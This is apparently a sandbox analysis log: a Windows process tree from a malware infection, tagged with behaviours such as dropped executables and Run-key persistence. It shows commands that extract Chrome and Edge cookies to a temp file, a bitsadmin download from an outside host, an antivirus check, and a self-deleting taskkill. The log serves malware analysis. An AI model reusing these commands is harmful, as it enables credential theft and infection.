C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2068 /prefetch:15⤵PID:1592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:15⤵PID:4112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7116 /prefetch:85⤵PID:1180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:15⤵PID:1704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:15⤵PID:2012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6268 /prefetch:85⤵PID:1392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:15⤵PID:4676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:15⤵PID:2776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1080 /prefetch:15⤵PID:4840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:85⤵PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 3948 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\TmkGCvXufEjdq7bBSflS1DJU.exe"4⤵PID:6420
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 39485⤵
- Kills process with taskkill
PID:5852
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 3948 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\TmkGCvXufEjdq7bBSflS1DJU.exe"4⤵PID:4564
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 39485⤵
- Kills process with taskkill
PID:6364
-
-
-
-
-
C:\Users\Admin\Documents\mJimMqtn6WWB9vVWN43v00Qa.exe"C:\Users\Admin\Documents\mJimMqtn6WWB9vVWN43v00Qa.exe"2⤵
- Executes dropped EXE
PID:1996 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 3123⤵
- Program crash
PID:4716
-
-
-
C:\Users\Admin\Documents\vri9QJNUrvtCCtcp5iTLexaq.exe"C:\Users\Admin\Documents\vri9QJNUrvtCCtcp5iTLexaq.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
C:\Users\Admin\Documents\52gsIfQbxcku44ZeI8702OJN.exe"C:\Users\Admin\Documents\52gsIfQbxcku44ZeI8702OJN.exe"2⤵
- Executes dropped EXE
PID:1192 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1192 -s 2443⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3988
-
-
-
C:\Users\Admin\Documents\wXv39P__TJcA2k12V2Zgx03I.exe"C:\Users\Admin\Documents\wXv39P__TJcA2k12V2Zgx03I.exe"2⤵
- Executes dropped EXE
PID:1388 -
C:\Users\Admin\Documents\wXv39P__TJcA2k12V2Zgx03I.exe"C:\Users\Admin\Documents\wXv39P__TJcA2k12V2Zgx03I.exe" -q3⤵
- Executes dropped EXE
PID:2460
-
-
-
C:\Users\Admin\Documents\1U9482xac9Vdw81qeLADoS78.exe"C:\Users\Admin\Documents\1U9482xac9Vdw81qeLADoS78.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
C:\Users\Admin\Documents\sItBlTP8i4E25HX__m218TGK.exe"C:\Users\Admin\Documents\sItBlTP8i4E25HX__m218TGK.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2432 -
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
- Drops startup file
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:1540
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
PID:2008
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:1468
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
PID:2168
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:6024
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:6132
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:6052
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:2060
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3704
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:1500
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:2248
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6624
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6640
-
-
-
-
C:\Users\Admin\Documents\mvaT_YqO7KekkPxnX5BA4Fiz.exe"C:\Users\Admin\Documents\mvaT_YqO7KekkPxnX5BA4Fiz.exe"2⤵
- Executes dropped EXE
PID:1608 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1608 -s 2043⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1364
-
-
-
C:\Users\Admin\Documents\HsB706rZ5ITpXQS1ycIHz9Ks.exe"C:\Users\Admin\Documents\HsB706rZ5ITpXQS1ycIHz9Ks.exe"2⤵
- Executes dropped EXE
PID:1200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c VC_redist.x64.exe /install /quiet3⤵PID:4924
-
C:\Users\Admin\Documents\VC_redist.x64.exeVC_redist.x64.exe /install /quiet4⤵PID:1536
-
C:\Windows\Temp\{7CC027BF-0455-4AE1-B58F-E8BED6F95628}\.cr\VC_redist.x64.exe"C:\Windows\Temp\{7CC027BF-0455-4AE1-B58F-E8BED6F95628}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\Admin\Documents\VC_redist.x64.exe" -burn.filehandle.attached=552 -burn.filehandle.self=560 /install /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3932 -
C:\Windows\Temp\{47FCA022-D2C1-4EF8-B93C-50C787A80F42}\.be\VC_redist.x64.exe"C:\Windows\Temp\{47FCA022-D2C1-4EF8-B93C-50C787A80F42}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{10DD3A21-7C7E-42EA-81E7-BF30E57F9270} {CBF76BDB-FE66-424D-9790-F178027040B6} 39326⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
PID:5100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 9126⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4184
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c VC_redist.x86.exe /install /quiet3⤵PID:4224
-
C:\Users\Admin\Documents\VC_redist.x86.exeVC_redist.x86.exe /install /quiet4⤵PID:5988
-
C:\Windows\Temp\{6E3C1040-B6A8-474A-8633-5F3F0CCC9D03}\.cr\VC_redist.x86.exe"C:\Windows\Temp\{6E3C1040-B6A8-474A-8633-5F3F0CCC9D03}\.cr\VC_redist.x86.exe" -burn.clean.room="C:\Users\Admin\Documents\VC_redist.x86.exe" -burn.filehandle.attached=552 -burn.filehandle.self=668 /install /quiet5⤵
- Loads dropped DLL
PID:6028 -
C:\Windows\Temp\{392245DB-C178-491E-B130-873ADE003C3D}\.be\VC_redist.x86.exe"C:\Windows\Temp\{392245DB-C178-491E-B130-873ADE003C3D}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{9A05BE42-A93B-4A19-99E8-ACF3636B130B} {DD46DA39-DE96-4E6E-8A42-5BEA522B4770} 60286⤵
- Adds Run key to start application
- Modifies registry class
PID:2568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6028 -s 14206⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6908
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\InstallShadowVPN.exe"C:\Users\Admin\AppData\Local\Temp\InstallShadowVPN.exe"3⤵PID:6740
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"4⤵PID:7120
-
C:\Users\Admin\AppData\Local\Temp\is-J8S89.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-J8S89.tmp\installer.tmp" /SL5="$802FE,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"5⤵
- Loads dropped DLL
PID:6068
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 13004⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 13524⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6696
-
-
-
-
C:\Users\Admin\Documents\1P2iyh2JidvGFh4oERonoUp_.exe"C:\Users\Admin\Documents\1P2iyh2JidvGFh4oERonoUp_.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4196 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4164
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵PID:4224
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵PID:3036
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵PID:5140
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵PID:5248
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵PID:7072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵
- Checks for any installed AV software in registry
PID:4892
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z3⤵
- Download via BitsAdmin
PID:6264 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Loads dropped DLL
PID:6740
-
-
-
-
C:\Users\Admin\Documents\8EiYpKhDEcXgXVlhx5Kwkd8q.exe"C:\Users\Admin\Documents\8EiYpKhDEcXgXVlhx5Kwkd8q.exe"2⤵
- Executes dropped EXE
PID:1380
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv R3q930x020WnyfI9gsy3Ow.0.21⤵
- Modifies data under HKEY_USERS
PID:4452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1996 -ip 19961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3276
-
C:\Users\Admin\AppData\Local\Temp\is-F65JB.tmp\8EiYpKhDEcXgXVlhx5Kwkd8q.tmp"C:\Users\Admin\AppData\Local\Temp\is-F65JB.tmp\8EiYpKhDEcXgXVlhx5Kwkd8q.tmp" /SL5="$10278,138429,56832,C:\Users\Admin\Documents\8EiYpKhDEcXgXVlhx5Kwkd8q.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4204 -
C:\Users\Admin\AppData\Local\Temp\is-0C7G7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0C7G7.tmp\Setup.exe" /Verysilent2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3620 -
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4716 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 2364⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6056
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"3⤵
- Executes dropped EXE
PID:4332 -
C:\Users\Admin\AppData\Local\Temp\is-432K6.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-432K6.tmp\MediaBurner2.tmp" /SL5="$10354,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\is-HRK7P.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-HRK7P.tmp\3377047_logo_media.exe" /S /UID=burnerch25⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
PID:5676 -
C:\Program Files\Reference Assemblies\PYCWJQLODX\ultramediaburner.exe"C:\Program Files\Reference Assemblies\PYCWJQLODX\ultramediaburner.exe" /VERYSILENT6⤵PID:5264
-
C:\Users\Admin\AppData\Local\Temp\is-3L2FJ.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-3L2FJ.tmp\ultramediaburner.tmp" /SL5="$9026A,281924,62464,C:\Program Files\Reference Assemblies\PYCWJQLODX\ultramediaburner.exe" /VERYSILENT7⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:656 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu8⤵PID:5456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5a-1e6ca-bc4-c9fa2-20ff7492e3150\Tyshywaecucae.exe"C:\Users\Admin\AppData\Local\Temp\5a-1e6ca-bc4-c9fa2-20ff7492e3150\Tyshywaecucae.exe"6⤵PID:5880
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e67⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:4716 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffde62a46f8,0x7ffde62a4708,0x7ffde62a47188⤵PID:5384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:28⤵PID:3908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:38⤵PID:5664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:88⤵PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:18⤵PID:6336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:18⤵PID:6384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:18⤵PID:6152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:18⤵PID:2288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4464 /prefetch:18⤵PID:1976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:88⤵PID:6512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:88⤵PID:2412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:18⤵PID:2524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5288 /prefetch:28⤵PID:4572
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad7⤵PID:3128
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47188⤵PID:5648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,9055095733945903782,3354374047673502159,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:38⤵PID:5804
-
-
-
